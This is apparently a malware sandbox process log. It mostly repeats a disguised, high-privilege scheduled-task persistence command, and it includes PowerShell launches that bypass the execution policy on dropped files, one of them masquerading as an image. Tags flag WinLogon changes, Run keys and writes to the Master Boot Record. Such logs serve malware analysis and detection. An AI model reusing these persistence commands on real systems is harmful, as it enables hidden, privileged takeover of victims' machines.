C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2448
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3880
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2404
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2908
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1168
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4388
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4068
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:736
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2392
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5036
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4808
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1548
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1352
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2284
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1008
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2728
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1044
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2792
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"' & exit2⤵PID:4348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"'3⤵
- Command and Scripting Interpreter: PowerShell
PID:1316
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4736
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2324
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3304
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4724
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1208
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4928
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3320
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2572
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3084
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2840
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4032
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1564
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1852
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1568
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4456
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4088
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:452
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:5036
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1116
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4808
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4720
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"' & exit2⤵PID:1912
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
PID:4736 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ov5u5ysv.lnq.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
PID:2664
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4624
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4920
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1408
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4388
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:748
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1124
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4532
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4328
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1692
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:228
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2524
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3980
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4628
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4280
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2396
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:5008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3656
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1556
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4728
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1484
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3956
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4484
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:672
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3160
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3520
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4740
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2056
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3672
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2244
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
- Loads dropped DLL
PID:4028
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3bc 0x4a81⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4496 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcf4b0ab58,0x7ffcf4b0ab68,0x7ffcf4b0ab782⤵PID:3472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:22⤵PID:5056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:1948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:2216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2812 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:12⤵PID:2416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2820 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:12⤵PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4352 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:12⤵PID:3244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 --field-trial-handle=2040,i,972790287956430419,15216854882481352750,131072 /prefetch:82⤵PID:396
-
-
